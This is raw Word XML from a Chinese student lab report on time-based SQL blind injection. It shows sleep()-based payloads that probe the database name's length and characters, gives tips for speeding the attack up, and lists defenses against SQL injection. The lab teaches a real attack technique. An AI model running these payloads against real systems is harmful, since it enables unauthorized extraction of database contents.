          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="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基于时间的SQL盲注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="840" w:leftChars="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>输入1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>and sleep(5) #，感觉到明显延迟</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="840" w:leftChars="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3718560" cy="1112520"/>
            <wp:effectExtent l="0" t="0" r="0" b="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400"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>输入1 and sleep(5) #，没有延迟</w:t>
      </w:r>
    </w:p>
    <w:p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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2948940" cy="1356360"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>说明存在字符型的基于时间的盲注。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left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 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="840" w:leftChars="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>1’ and if(length(database())=1,sleep(5),1) #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>没有延迟</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="840" w:leftChars="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3931920" cy="1356360"/>
            <wp:effectExtent l="0" t="0" r="0" b="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="840" w:leftChars="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>and if(length(database())=4,sleep(5),1) # 明显延迟</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="840" w:leftChars="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4869180" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0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="840" w:leftChars="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>and if(ascii(substr(database(),1,1))&gt;97,sleep(5),1)# 明显延迟</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5074920" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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="840" w:leftChars="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>同理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以猜测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>表、字段和数据</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pP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实验的优化：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"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（1）二分法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在基于布尔SQL盲注的实验中，如果没有其他的已知条件或手段，从所有可能的数据库名字中一个一个尝试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代价非常高昂，不太可取。相较之下，采用二分法可以更有效地找到正确的数据库名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，提高查询的效率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="420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（2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用多线程或协程：通过同时发送多个请求，可以提高查询效率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="420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（3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用自动化工具：为了克服SQL盲注攻击的复杂性和低效性，可以利用一些自动化工具辅助或完成SQL盲注攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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心得：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"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通过本次实验，学习到了基于布尔的SQL盲注和基于时间的SQL盲注，以及具体的盲注方法、步骤和一些细节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"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在学习了SQL漏洞后，也了解学习了一些SQL注入的防御措施，包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="400" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) 在服务端正式处理之前对提交数据的合法性进行检查； </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="400" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) 封装客户端提交信息； </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="400" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) 替换或删除敏感字符/字符串； </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="1260" w:firstLineChars="600"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">(4) 屏蔽出错信息。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92799C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C492799C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6CFC169D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6CFC169D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ExNGI0MTE3YmYxNjVlM2IzZTE1OThmYjQ1YTdmZDQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="001F1E13"/>
    <w:rsid w:val="0000472F"/>
    <w:rsid w:val="00015EEE"/>
    <w:rsid w:val="000C408B"/>
    <w:rsid w:val="00114A1E"/>
    <w:rsid w:val="001D79EA"/>
    <w:rsid w:val="001F1E13"/>
    <w:rsid w:val="002D417A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311D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04D5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</Pages>
  <Words>250</Words>
  <Characters>299</Characters>
  <Lines>2</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>324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2023-03-06T12:13:00Z</dcterms:created>
  <dc:creator>刘哲理</dc:creator>
  <cp:lastModifiedBy>微信用户</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-03T16:07:02Z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3742B4943E7040FF92C6B61F6B6F8ED7_12</vt:lpwstr>
  </property>
</Properties>
</file>